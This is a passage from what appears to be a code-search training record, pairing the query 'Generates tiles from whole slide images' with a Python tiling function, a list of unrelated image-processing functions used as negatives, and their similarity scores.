simgas.m.sum()/np.sum(map2D) \n print('Min and max of map: ',map2D.min(),map2D.max())\n #map2D[map2D < 1e4] = 1e6\n # Plot map\n if not p.R_max:\n p.R_max = max_scale/2\n if p.log: \n if not p.vmax: p.vmax = np.log10(map2D).max()\n if not p.vmin: p.vmin = np.log10(map2D).max() - 4\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n else:\n if not p.vmax: p.vmax = np.max(map2D)\n if not p.vmin: p.vmin = np.min(map2D) / 1e3\n map2D[map2D < p.vmin] = p.vmin #np.min(map2D[map2D > 0])\n map2D = np.flipud(map2D)\n\n im = ax1.imshow(map2D,\\\n extent=[-max_scale/2,max_scale/2,-max_scale/2,max_scale/2],vmin=p.vmin,vmax=p.vmax,cmap=p.cmap)\n # Limit axes limits a bit to avoid area with no particles...\n zoom = 1#/1.5\n ax1.set_xlim([-1/zoom * p.R_max,1/zoom * p.R_max])\n ax1.set_ylim([-1/zoom * p.R_max,1/zoom * p.R_max])\n if p.colorbar: \n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(im,cax=cax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n if (p.prop == 'm') & (p.text == True):\n simstar = aux.load_temp_file(gal_ob=gal_ob,data_type='simstar')\n ax1.text(0.05,0.92,'M$_{star}$=%.1e M$_{\\odot}$' % np.sum(simstar.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.86,'M$_{gas}$=%.1e M$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.80,'SFR=%.2f M$_{\\odot}$/yr' % GR.SFR[p.gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/') \n plt.savefig(p.d_plot + 'sim_data/map_%s_G%i.png' % (p.prop,p.gal_index), format=p.format, dpi=250, facecolor='w')\n\n if not p.colorbar: return(im)", "def fRes(self, mag, size, ps):\n x = 2 * np.pi * mag / (size[0] * ps[0])\n y = 2 * np.pi * mag / (size[1] * ps[1])\n return [x, y]", "def image(self):\n\n # image dimension ...\n # margin + DPI * double radius * mm to cm to inch\n size = int(data.Export.MARGIN + data.Export.DPI * 2 * self.radius * 0.1 / 2.54)\n\n x = size / 2\n y = size / 2\n\n # scaling to the DPI\n r = data.Export.DPI * self.radius * .1 / 2.54\n i = data.Export.DPI * self.inner_radius * .1 / 2.54\n\n image = Image.new(\"RGBA\", (size, size))\n\n draw = ImageDraw.Draw(image)\n draw.ellipse((x-r, y-r, x+r, y+r), fill=(0,0,0,255))\n draw.ellipse((x-i, y-i, x+i, y+i), fill=(0,0,0,0))\n return image", "def RescaleScreenShot(bmp, thumbnail_size=200):\r\n\r\n bmpW, bmpH = bmp.GetWidth(), bmp.GetHeight()\r\n img = bmp.ConvertToImage()\r\n\r\n newW, newH = bmpW, bmpH\r\n \r\n if bmpW > bmpH:\r\n if bmpW > thumbnail_size:\r\n ratio = bmpW/float(thumbnail_size)\r\n newW, newH = int(bmpW/ratio), int(bmpH/ratio)\r\n img.Rescale(newW, newH, wx.IMAGE_QUALITY_HIGH)\r\n else:\r\n if bmpH > thumbnail_size:\r\n ratio = bmpH/float(thumbnail_size)\r\n newW, newH = int(bmpW/ratio), int(bmpH/ratio)\r\n img.Rescale(newW, newH, wx.IMAGE_QUALITY_HIGH)\r\n\r\n newBmp = img.ConvertToBitmap()\r\n otherBmp = wx.EmptyBitmap(newW+5, newH+5) \r\n\r\n memDC = wx.MemoryDC()\r\n memDC.SelectObject(otherBmp)\r\n memDC.SetBackground(wx.WHITE_BRUSH)\r\n memDC.Clear()\r\n \r\n memDC.SetPen(wx.TRANSPARENT_PEN)\r\n\r\n pos = 0\r\n for i in xrange(5, 0, -1):\r\n brush = wx.Brush(wx.Colour(50*i, 50*i, 50*i))\r\n memDC.SetBrush(brush)\r\n memDC.DrawRoundedRectangle(0, 0, newW+5-pos, newH+5-pos, 2)\r\n pos += 1\r\n\r\n memDC.DrawBitmap(newBmp, 0, 0, True)\r\n \r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n return otherBmp", "def thumbnail(im, config):\n\n im.thumbnail(\n (config['width'], config['height']),\n ANTIALIAS,\n )\n\n return im", "def processImage(picture_data, target_dir):\n img = Image.open(picture_data)\n exif = img._getexif()\n if exif is not None:\n for tag, value in exif.items():\n decoded = TAGS.get(tag, tag)\n if decoded == \"Orientation\":\n if value == 3:\n img = img.rotate(180)\n if value == 6:\n img.rotate(270)\n if value == 8:\n img.rotate(90)\n break\n img = maxSize(img, (1024, 768), Image.ANTIALIAS)\n # generate a random 8-byte (i.e. 16-character string)\n random_hex = secrets.token_hex(8)\n # split the filename to get the extension\n _, f_ext = os.path.split(picture_data.filename)\n # generate the new filename\n new_filename = random_hex + f_ext\n # calculate the full path to save the file, and save it\n path_to_save = os.path.join(current_app.root_path, target_dir, new_filename)\n # thumbs directory\n thumbs_dir = os.path.join(current_app.root_path, target_dir, \"thumbs\")\n if not os.path.exists(thumbs_dir):\n os.mkdir(thumbs_dir)\n img.save(path_to_save, \"JPEG\", quality=100)\n img.thumbnail((300, 300))\n img.save(os.path.join(thumbs_dir, new_filename))\n\n return new_filename", "def Rescale(self):\r\n picWidth,picHeight = self.oldSize = self.GetSizeTuple()\r\n bitmap = self.scaled = self.bitmap\r\n if not bitmap: return\r\n imgWidth,imgHeight = bitmap.GetWidth(),bitmap.GetHeight()\r\n if self.scaling == 2 or (self.scaling == 1 and (imgWidth > picWidth or imgHeight > picHeight)):\r\n image = bitmap.ConvertToImage()\r\n factor = min(1.0*picWidth/imgWidth,1.0*picHeight/imgHeight)\r\n newWidth,newHeight = int(factor*imgWidth),int(factor*imgHeight)\r\n self.scaled = image.Scale(newWidth,newHeight).ConvertToBitmap()\r\n #self.scaled = image.Scale(newWidth,newHeight,wx.IMAGE_QUALITY_HIGH ).ConvertToBitmap()\r", "def create_thumbnail(self, target, format=None):", "def showimage(image):\n mplt.figure()\n mplt.imshow(image)\n mplt.show()", "def Cutout(img: Image, magnitude: float) -> Image:\n if magnitude == 0.0:\n return img\n w, h = img.size\n xy = get_rand_bbox_coord(w//2, h//2, magnitude)\n\n img = img.copy()\n PIL.ImageDraw.Draw(img).rectangle(xy, fill=FILLCOLOR)\n return img", "def resizeImage(self):\n ratio = float(self.qIma.width()) / float(self.qIma.height())\n if self.qIma.width() > self.qIma.height():\n maxWidth = 300\n maxHeight = int(300 / ratio)\n else:\n maxWidth = int(300 / ratio)\n maxHeight = 300\n img = self.qIma.toImage().scaled(maxWidth, maxHeight, QtCore.Qt.KeepAspectRatio)\n return img", "def create_full_pic(self):\n self.create_half_pic()\n mirror_update(self.flag)", "def generate_image(self, imagename, antenna='', cellsize='8arcmin', npix=512, niter=0, threshold='0Jy', weighting='uniform', start=200, stop=900, uvlength=0, uvsign='>', phasecenter='', gridmode='', wprojplanes=1024, script='clean', del_script=True):\n ct.imaging(self.ms, imagename, antenna=antenna, cellsize=cellsize, npix=npix, niter=niter, threshold=threshold, weighting=weighting, start=start, stop=stop, uvlength=uvlength, uvsign=uvsign, phasecenter=phasecenter, gridmode=gridmode, wprojplanes=wprojplanes, script=script, delete=del_script)", "def get_image_size(self):", "def lensedImage(self, source, scale, xl=8., yl=4., gamma=0.):\n image, magMap = lens(self.ltype, self.dist, source, self.x01, self.x02, xl, yl, gamma)\n\n return image, magMap", "def image_preview(self):\r\n h = '<img src=\"%s\" alt=\"%s\"/>' % (self.image_resized_url, self.title)\r\n return mark_safe(h)", "def show_image(im, rescale=False) :\r\n \r\n plt.figure()\r\n im = im.copy()\r\n im.resize(*LFW_IMAGESIZE)\r\n if rescale :\r\n plt.imshow(im.astype(float), cmap=plt.cm.get_cmap(\"gray\"))\r\n else :\r\n plt.imshow(im.astype(float), cmap=plt.cm.get_cmap(\"gray\"), vmin=0, vmax=255)\r\n plt.axis('off')\r\n plt.show()", "def build_filler_images(self):", "def view(self):\n plt.imshow(self.texture_array, vmin = 0, vmax = 255)\n if self.texture_array.ndim == 2:\n plt.set_cmap('gray')\n \n plt.title(self.texture_name)\n plt.show()", "def logosmall(self):\n try:\n asset = self.app.module_map.uploader.get(self.barcamp.logo)\n except AssetNotFound:\n asset = None\n if not asset:\n return u\"\"\n v = asset.variants['medium_user']\n url = self.app.url_for(\"asset\", asset_id = v._id)\n return \"\"\"<a href=\"%s\"><img src=\"%s\" width=\"%s\" height=\"%s\"></a>\"\"\" %(\n self.handler.url_for(\"barcamps.index\", slug = self.barcamp.slug),\n url,\n v.metadata['width'],\n v.metadata['height'])", "def _image(self):\n print(\"imaging\")\n self.images.append(self.device_control.image())\n yield", "def plot_thumb(self, data_fname):\n thumbnail = self.controller.plot_thumb(data_fname, self.bitmap_width, self.bitmap_height)\n if thumbnail is not None:\n self.figure_bmp.SetBitmap(thumbnail)\n else:\n self.plot_blank()", "def do_icon(srcfn, magnitude):\n img = Image.open(\"%s.png\" % (srcfn, ))\n draw = ImageDraw.Draw(img)\n (width, _height) = FONT.getsize(magnitude)\n # 40 pixel wide, we want to center it\n x0 = int(20 - (width / 2.))\n draw.text((x0, 8), magnitude, font=FONT, fill=(0, 0, 0, 255))\n img.save((\"../../htdocs/icons/lsr/%s/%s.png\"\n ) % (srcfn, magnitude))\n del img\n del draw", "def extract_single(self, sub_h, sub_w, zoom_min=2, zoom_max=4, margin=10, write_path=None):\n\n k = np.random.randint(0, len(self.collection.short_fnames))\n\n name = self.collection.short_fnames[k]\n bg = self.collection.imgs[k]\n big_h, big_w, _ = bg.shape\n\n zoomed_h, zoomed_w = self._zoom(sub_h, sub_w, zoom_min, zoom_max)\n\n if 'fs' in name:\n # print('fs bg')\n zoomed_h = sub_h\n zoomed_w = sub_w\n\n circumscribe_radius = np.ceil(np.sqrt(zoomed_h ** 2 + zoomed_w ** 2))\n circumscribe_radius = int(circumscribe_radius) + margin\n\n cen_x = np.random.randint(circumscribe_radius, big_w - circumscribe_radius)\n cen_y = np.random.randint(circumscribe_radius, big_h - circumscribe_radius)\n\n x1 = int(cen_x - circumscribe_radius / 2)\n y1 = int(cen_y - circumscribe_radius / 2)\n\n x2 = int(cen_x + circumscribe_radius / 2)\n y2 = int(cen_y + circumscribe_radius / 2)\n\n raw_crop = bg[y1:y2, x1:x2]\n # cv2.imshow('raw crop',raw_crop)\n\n rotated = self._rotate(raw_crop, zoomed_h, zoomed_w)\n rotated = cv2.resize(rotated, (sub_w, sub_h))\n\n img = self._bg_augmentation(rotated)\n # cv2.imshow('rotated',rotated)\n # print(rotated.shape)\n\n if write_path is not None:\n cv2.imwrite(write_path, img)\n return img", "def setImageDimensions(*args):", "def coral_image_resize(im, scaling_method, scaling_factor, height_cm):\n\n if scaling_method == 'scale':\n scale = float(scaling_factor) # here scaling_factor is the desired image scaling.\n elif scaling_method == 'ratio':\n scale = float(scaling_factor) * height_cm / im.shape[0] # here scaling_factor is the desited px_cm_ratio.\n im = scipy.misc.imresize(im, scale)\n return (im, scale)", "def magick(inp, out):\n\n subprocess.call([\"magick\", inp, out], shell=os.name == \"nt\")", "def magick(inp, out):\n\n subprocess.call([\"magick\", inp, out], shell=os.name == \"nt\")", "def draw(self, prof, image, method, offset, config, base, logger, **kwargs):\n # ... draw prof onto the given image (making a new Image if necessary)\n if prof is None:\n return image\n else:\n logger = galsim.config.LoggerWrapper(logger)\n # Setup the kwargs to pass to drawImage\n # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.)\n kwargs['image'] = image\n kwargs['offset'] = offset\n kwargs['method'] = method\n if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover\n kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0]\n if 'wcs' not in kwargs and 'scale' not in kwargs:\n kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos'])\n if method == 'phot' and 'rng' not in kwargs:\n kwargs['rng'] = galsim.config.GetRNG(config, base, logger, \"method='phot'\")\n\n # Check validity of extra phot options:\n max_extra_noise = None\n if 'n_photons' in config and 'n_photons' not in kwargs:\n if method != 'phot':\n raise AttributeError('n_photons is invalid with method != phot')\n if 'max_extra_noise' in config:\n logger.warning(\n \"Both 'max_extra_noise' and 'n_photons' are set in config dict, \"+\n \"ignoring 'max_extra_noise'.\")\n kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0]\n elif 'max_extra_noise' in config:\n max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0]\n if method != 'phot' and max_extra_noise is not None:\n raise AttributeError('max_extra_noise is invalid with method != phot')\n\n if 'poisson_flux' in config and 'poisson_flux' not in kwargs:\n if method != 'phot':\n raise AttributeError('poisson_flux is invalid with method != phot')\n kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0]\n\n if max_extra_noise is not None and 'max_extra_noise' not in kwargs:\n if max_extra_noise < 0.:\n raise ValueError(\"image.max_extra_noise cannot be negative\")\n if 'image' in base and 'noise' in base['image']:\n noise_var = galsim.config.CalculateNoiseVariance(base)\n else:\n raise AttributeError(\"Need to specify noise level when using max_extra_noise\")\n if noise_var < 0.:\n raise ValueError(\"noise_var calculated to be < 0.\")\n max_extra_noise *= noise_var\n kwargs['max_extra_noise'] = max_extra_noise\n\n if logger.isEnabledFor(logging.DEBUG):\n # Don't output the full image array. Use str(image) for that kwarg.\n alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k])\n for k in kwargs])\n logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs)\n logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof)\n try:\n # NOTE: Old version:\n # image = prof.drawImage(**kwargs)\n if isinstance(prof, galsim.GSObject):\n image = prof.drawImage(**kwargs)\n elif isinstance(prof, galsim.ChromaticObject):\n bp = {}\n for key in (self._req_bp_fields+self._opt_bp_fields):\n try:\n bp[key] = config['bandpass'][key]\n except KeyError:\n bp[key] = None\n\n bandpass = galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'],\n wave_type=bp['wave_type'], throughput=bp['throughput'],\n zeropoint=bp['zeropoint'])\n\n image = prof.drawImage(bandpass=bandpass, **kwargs)\n\n except Exception as e: # pragma: no cover\n logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof)\n raise\n return image", "def write(fname, face, min_=0, max_=255):\n image = face.reshape(IMG_HEIGHT, IMG_WIDTH)\n res = plt.matshow(image, cmap='gray', vmin=min_, vmax=max_)\n res.axes.get_xaxis().set_visible(False)\n res.axes.get_yaxis().set_visible(False)\n plt.axis(\"off\")\n plt.savefig(fname, bbox_inches=\"tight\")", "def photometry(self, ZP, ifilter, radius=3., show=False, outfile=None):\n\n # Init\n if self.segm is None:\n raise ValueError(\"segm not set!\")\n if self.hdu is None:\n self.load_image()\n\n # Zero point\n if isinstance(ZP, str):\n ZP = self.header[ZP]\n\n self.cat = photutils.source_properties(self.hdu.data - self.bkg.background,\n self.segm,\n kron_params=('mask', 2.5, 1.0, 'exact', 5),\n background=self.bkg.background,\n filter_kernel=self.kernel)\n\n # Apertures\n apertures = []\n for obj in self.cat:\n position = np.transpose((obj.xcentroid.value, obj.ycentroid.value))\n a = obj.semimajor_axis_sigma.value * radius\n b = obj.semiminor_axis_sigma.value * radius\n theta = obj.orientation.to(units.rad).value\n apertures.append(photutils.EllipticalAperture(position, a, b, theta=theta))\n self.apertures = apertures\n\n # Magnitudes\n self.filter = ifilter\n self.photom = self.cat.to_table().to_pandas()\n self.photom[ifilter] = -2.5 * np.log10(self.photom['source_sum']) + ZP\n\n # Kron\n for key in ['kron_radius']:\n self.photom[key] = getattr(self.cat, key)\n\n # Plot?\n if show or outfile is not None:\n norm = ImageNormalize(stretch=SqrtStretch())\n fig = plt.figure(figsize=(6, 6))\n\n # fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 12.5))\n plt.clf()\n ax1 = plt.gca()\n ax1.imshow(self.hdu.data, origin='lower', cmap='Greys_r', norm=norm)\n ax1.set_title('Data')\n #\n for aperture in apertures:\n aperture.plot(axes=ax1, color='white', lw=1.5)\n if outfile is not None: # This must come first\n plt.savefig(outfile, dpi=300)\n if show:\n plt.show()", "def _print_image(self, line, size):\n i = 0\n cont = 0\n\n self._write(self.__class__.__imageSize['1x1'])\n buffer = bytearray([int((size[0] / size[1]) / 8), 0, size[1], 0])\n\n self._write(buffer)\n buffer = bytearray()\n\n while i < len(line):\n hex_string = int(line[i:i + 8], 2)\n buffer.append(hex_string)\n i += 8\n cont += 1\n if cont % 4 == 0:\n self._write(buffer)\n buffer = bytearray()\n cont = 0", "def disImg(data=None,colorbar=False):\n size = np.sqrt(len(data[4:]))\n xmm = data[0]\n ymm = data[1]\n pl.matshow(data[4:].reshape(size,size),fignum=False)\n if colorbar == True:\n pl.colorbar()\n pl.xlim(0,size-1)\n pl.ylim(0,size-1)\n pl.xlabel('Pixels')\n pl.ylabel('Pixels')\n pl.grid(color='yellow')", "def on_image(self, image):", "def thumbnail(self, item):\n if self._has_image_field(item) and self._field_is_visible('image'):\n tile_conf = self.get_tile_configuration()\n image_conf = tile_conf.get('image', None)\n if image_conf:\n scaleconf = image_conf['imgsize']\n # Scale string is something like: 'mini 200:200'.\n # We need the name only: 'mini'.\n scale = scaleconf.split(' ')[0]\n scales = ploneapi.content.get(path='@@images')\n return scales.scale('image', scale)", "def adjust(self, image):\n ...", "def generate_image( now ):\n cmd = \"csh mwplot.csh %s\" % (\n now.strftime(\"%Y %m %d %H %M\"),)\n subprocess.call(cmd, shell=True)", "def display(self):\n display(self.image)", "def run_image_viewer( self ):\n\n # XXX: hardcoded program name and image size.\n subprocess.Popen( [\"feh\", \"-dZ\", \"-g\", \"800x600\", self.record[\"filename\"]] )", "def printImage(imageObject):\n # TODO\n pass", "def show_image(file_location):\n img = Image.open(file_location)\n img.show()", "def make_big_e(self):\n l = self.l_i\n self.img[l/2-1:l/2+1, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2-3, l/2-5:l/2+5] = 1\n self.img[l/2+3:l/2+5, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2+5, l/2-5:l/2-3] = 1\n self.img_name = 'bigE'", "def get_thumbnail_path(examfile):\n h = examfile.hash\n thumb = os.path.join(settings.MEDIA_ROOT, \"cache\", h + \".png\")\n if os.path.exists(thumb):\n return thumb\n path = os.path.join(settings.MEDIA_ROOT, examfile.path.path)\n cmd = \"/usr/local/bin/mudraw -o %s -h 800 -w 600 '%s' 1\" % (thumb, path)\n args = shlex.split(cmd.encode(\"utf8\"))\n mudraw = subprocess.Popen(args)\n mudraw.wait()\n return thumb", "def FlyResize( image, log_mess, nimages, method = Image.ANTIALIAS ):\n oldw, oldh = image.size\n resl = [8, 10, 14, 16, 20, 22, 24, 32, 40, 48, 64, 96, 128, 256]\n \n if oldw > 256 or oldh > 256:\n newsiz = min(resl, key = lambda x:abs(x - max(oldw, oldh)))\n image.thumbnail((newsiz, newsiz), method)\n neww, newh = image.size\n log_mess += ' and new size scaled = %s x %s' %(neww, newh)\n elif nimages > 1:\n log_mess += ' and size = %s x %s' %(oldw, oldh)\n \n return oldw, oldh, image, log_mess" ]
[ "0.60173213", "0.5782513", "0.5777427", "0.5764191", "0.56933355", "0.56771076", "0.56483626", "0.5612517", "0.5609735", "0.56014514", "0.5599658", "0.55762804", "0.55341315", "0.55226684", "0.5477635", "0.5477049", "0.546813", "0.54632145", "0.54585576", "0.54283446", "0.538394", "0.5378996", "0.5364472", "0.53544694", "0.5351772", "0.5351307", "0.5337051", "0.5331377", "0.53030133", "0.52952546", "0.52938133", "0.52873105", "0.52844024", "0.52760565", "0.5274738", "0.5262607", "0.52600974", "0.5258317", "0.5257417", "0.525401", "0.52484196", "0.52472216", "0.5243544", "0.5237566", "0.5232085", "0.52292854", "0.5217103", "0.52108175", "0.51886094", "0.51778203", "0.5174832", "0.51715744", "0.51317376", "0.5124422", "0.5121878", "0.5119942", "0.5119942", "0.51158214", "0.51096123", "0.5095431", "0.50937515", "0.5093581", "0.5091502", "0.5082471", "0.5075035", "0.5072997", "0.5065018", "0.5055042", "0.5046445", "0.50443405", "0.50441897", "0.50411206", "0.5037271", "0.503554", "0.5031915", "0.50298345", "0.5029529", "0.50269485", "0.5024524", "0.5023434", "0.5018181", "0.50172234", "0.500898", "0.5000002", "0.5000002", "0.49999103", "0.49975145", "0.49968353", "0.4992059", "0.49910575", "0.49902743", "0.49877796", "0.49857852", "0.4985447", "0.49835876", "0.49780378", "0.49776936", "0.4976623", "0.49755245", "0.49752876", "0.49750602" ]
0.0
-1
Generates tiles from whole slide images
def tile_gen_at_mag(wsi, mag, tile_size): #Get size of WSI at Level 0 (Max Magnification) x0, y0 = wsi.level_dimensions[0] #Get size of WSI at the mag we want x_mag, y_mag = get_size_for_mag(wsi, mag) x_tiles = int(np.floor(x_mag/tile_size)) y_tiles = int(np.floor(y_mag/tile_size)) #Scale tile size accordingly scale = highest_mag(wsi)/mag yield (x_tiles, y_tiles) tiles = [] for y in range(y_tiles): for x in range(x_tiles): x_coord = round(x*scale*tile_size) y_coord = round(y*scale*tile_size) scaled_tile_size = round(scale*tile_size) tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size)) yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tile_slides(slides_filepaths, desired_tile_with, desired_overlap, desired_magnification):\n containing_folders = []\n for slide_filepath in slides_filepaths:\n containing_folders.append(tile_slide(slide_filepath, desired_tile_with, desired_overlap, desired_magnification))\n return containing_folders", "def dynamic_tiles(slide_name, small_tile_in_tile=False):\n np_img = slide.get_slide(slide_name)\n filt_np_img = filters.apply_image_filters(np_img)\n tile_summary = score_tiles(slide_name, filt_np_img, small_tile_in_tile)\n return tile_summary", "def make_tiles(input_path, save_path, dimension):\n for filename in os.listdir(input_path):\n if filename.endswith(\".png\"):\n image_path = input_path + filename\n\n width, height = Image.open(image_path).size\n\n # Ensures image is square.\n assert width == height\n # Ensures the image can be cut into the desired dimensions.\n assert width % dimension == 0\n n_tiles = (width / dimension) ** 2\n\n tiles = image_slicer.slice(image_path, n_tiles, save=False)\n image_slicer.save_tiles(\n tiles, directory=save_path, prefix=filename[0:2], format=\"png\"\n )", "def image_tiles(bqsession, image_service_url, tile_size=64):\n dims = bqsession.fetchxml(image_service_url, dims='')\n x = int(dims.xpath('//tag[@name=\"image_num_x\"]')[0].attrib[ 'value'])\n y = int(dims.xpath('//tag[@name=\"image_num_y\"]')[0].attrib[ 'value'])\n \n for ix in range(int(x/tile_size)-1):\n for iy in range(int(y/tile_size)-1):\n yield bqsession.c.prepare_url(image_service_url, tile='0,%s,%s,%s' % (str(ix), str(iy), str(tile_size)))", "def montage(images, w_sub, h_sub, step):\n target = Image.new('RGB', (w_sub*step, h_sub*step))\n left = 0\n right = w_sub\n for i in range(len(images)):\n top=(i//step)*h_sub\n target.paste(images[i], (left, top, right, top+h_sub))\n if(i//step < (i+1)//step):#Check if this row is done\n left = 0#Reset the position in a row\n right = w_sub\n else: #Next picture\n left += w_sub\n right += w_sub\n quality_value = 100\n return target", "def image_range_to_tiles(start_ind, end_ind, display=False, save_summary=True, save_data=True, save_top_tiles=True):\n image_list = list()\n tile_summaries_dict = dict()\n for slide_name in range(start_ind, end_ind + 1):\n tile_summary = summary_and_tiles(slide_name, display, save_summary, save_data, save_top_tiles)\n image_list.append(slide_name)\n tile_summaries_dict[slide_name] = tile_summary\n return image_list, tile_summaries_dict", "def build_tiles(img,tilefile,tilesize,options=[]):\n\tlevels=ceil(log(max(img.get_xsize(),img.get_ysize())/tilesize)/log(2.0))\n\t\n\ttf=file(tilefile,\"w\")\n\t\n\ttile_dict={}\n\tpos=0\n\timg2=img.copy()\n\txs,ys=img2.get_xsize(),img2.get_ysize()\n\tfor l in range(int(levels)):\n\t\trmin=img2.get_attr(\"mean\")-img2.get_attr(\"sigma\")*3.0\n\t\trmax=img2.get_attr(\"mean\")+img2.get_attr(\"sigma\")*3.0\n\t\tfor x in range(0,img2.get_xsize(),tilesize):\n\t\t\tfor y in range(0,img2.get_ysize(),tilesize):\n\t\t\t\ti=img2.get_clip(Region(x,y,tilesize,tilesize))\n\t\t\t\ti.set_attr(\"render_min\",rmin)\n\t\t\t\ti.set_attr(\"render_max\",rmax)\n\t\t\t\ti.set_attr(\"jpeg_quality\",70)\n\t\t\t\tfsp=\"tmpimg.%d.%03d.%03d.jpg\"%(l,x/tilesize,y/tilesize)\n\t\t\t\ti.write_image(fsp)\n\t\t\t\tsz=os.stat(fsp).st_size\n\t\t\t\ttile_dict[(l,x/tilesize,y/tilesize)]=(pos,sz)\n\t\t\t\tpos+=sz\n\t\timg2.process_inplace(\"math.meanshrink\",{\"n\":2})\n\t\n\t# This will produce 2 power spectrum images in the tile file\n\t# with scale factors -1 and -2\n\tif \"pspec\" in options :\n\t\tnx,ny=img.get_xsize()/512,img.get_ysize()/512\n\t\ta=EMData()\n\t\ta.set_size(512,512)\n\t\tif (ny>2 and nx>2) :\n\t\t\tfor y in range(1,ny-1):\n\t\t\t\tfor x in range(1,nx-1):\n\t\t\t\t\tc=img.get_clip(Region(x*512,y*512,512,512))\n\t\t\t\t\tc.process_inplace(\"normalize\")\n\t\t\t\t\tc.process_inplace(\"math.realtofft\")\n\t\t\t\t\tc.process_inplace(\"math.squared\")\n\t\t\t\t\ta+=c\n\t\t\ta.set_value_at(256,256,0,.01)\n\t\t\ta-=a.get_attr(\"minimum\")-a.get_attr(\"sigma\")*.01\n\t\t\ta.process_inplace(\"math.log\")\n\t\t\ta-=a.get_attr(\"minimum\")\n\t\t\ta.set_attr(\"render_min\",a.get_attr(\"minimum\")-a.get_attr(\"sigma\")*.1)\n\t\t\ta.set_attr(\"render_max\",a.get_attr(\"mean\")+a.get_attr(\"sigma\")*4.0)\n\t\t\ta.set_attr(\"jepg_quality\",80)\n\t\t\ta.write_image(\"/tmp/tmpimg.mrc\")\n\t\t\tfsp=\"tmpimg.jpg\"\n\t\t\ta.write_image(fsp)\n\t\t\tsz=os.stat(fsp).st_size\n\t\t\ttile_dict[(-1,0,0)]=(pos,sz)\n\t\t\tpos+=sz\n\t\n#\t\ttry:\n\t\t\timport matplotlib\n\t\t\tmatplotlib.use('Agg')\n\t\t\timport pylab\n\t\t\tmanager = pylab.get_current_fig_manager()\n\t\t\tapix=options[\"pspec\"]\n\t\t\tdx=1.0/(2.0*apix*256.0)\n\t\t\tx=pylab.arange(dx,dx*255.9,dx)\n\t\t\ty=a.calc_radial_dist(255,1,1,0)\t# radial power spectrum (log)\n\t\t\tpylab.figure(figsize=(8,6),dpi=96)\n\t\t\tpylab.axes([.08,.08,.9,.9], axisbg='w')\n\t\t\tpylab.plot(x,y)\n\t\t\tpylab.axis([0,dx*256,min(y),max(y)])\n\t\t\tpylab.xlabel(\"Spatial Freq. (1/A)\")\n\t\t\tpylab.ylabel(\"Log Intensity (10^x)\")\n#\t\t\tprint y\n\t\t\t\n\t\t\tfsp=\"tmpimg2.png\"\n\t\t\tpylab.savefig(fsp,dpi=96)\n\t\t\tsz=os.stat(fsp).st_size\n\t\t\ttile_dict[(-2,0,0)]=(pos,sz)\n\t\t\tpos+=sz\n\n#\t\texcept:\n#\t\t\tprint \"Unable to generate plot (need matplotlib)\"\n\t\t\t\n\t\n\tpickle.dump(tile_dict,tf)\n\t\n\tfor l in range(int(levels)):\n\t\tfor x in range(0,xs,tilesize):\n\t\t\tfor y in range(0,ys,tilesize):\n\t\t\t\tfsp=\"tmpimg.%d.%03d.%03d.jpg\"%(l,x/tilesize,y/tilesize)\n\t\t\t\ta=file(fsp,\"r\")\n\t\t\t\tb=a.read()\n\t\t\t\ta.close()\n\t\t\t\ttf.write(b)\n\t\t\t\tos.remove(fsp)\n\t\txs/=2\n\t\tys/=2\n\t\n\tif \"pspec\" in options :\n\t\tfor fsp in [\"tmpimg.jpg\",\"tmpimg2.png\"] :\n\t\t\ta=file(fsp,\"r\")\n\t\t\tb=a.read()\n\t\t\ta.close()\n\t\t\ttf.write(b)\n#\t\t\tos.remove(fsp)\n\t\n\ttf.close()", "def tile_images(image_stack):\n assert len(image_stack.shape) == 4\n image_list = [image_stack[i, :, :, :] for i in range(image_stack.shape[0])]\n tiled_images = np.concatenate(image_list, axis=1)\n return tiled_images", "def slice_to_tiles(self, tile_raw_size=None, show_info=\"\"):\n if not tile_raw_size: tile_raw_size = self.tile_raw_size\n tile_raw_w,tile_raw_h = tile_raw_size\n tile_w,tile_h = round(tile_raw_w),round(tile_raw_h)\n\n if show_info:\n print(f\" ==Slicing {show_info} Tiles==\")\n print(f' Tile raw size: {tile_raw_size[0]} x {tile_raw_size[1]} px\\n')\n\n #process into list of image objects\n tiles = []\n true_x, true_y = (0,0)\n with Image.open(self.path) as img_obj:\n w,h = img_obj.size\n for row in range(0,h-tile_h,tile_h):\n tiles_row = []\n y = round(true_y)\n for col in range(0,w-tile_w,tile_w):\n x = round(true_x)\n im_crop = img_obj.crop((x,y,x+tile_w,y+tile_h))\n tiles_row.append(im_crop)\n true_x += tile_raw_w\n tiles.append(tiles_row)\n true_y += tile_raw_h\n true_x = 0\n\n return tiles", "def 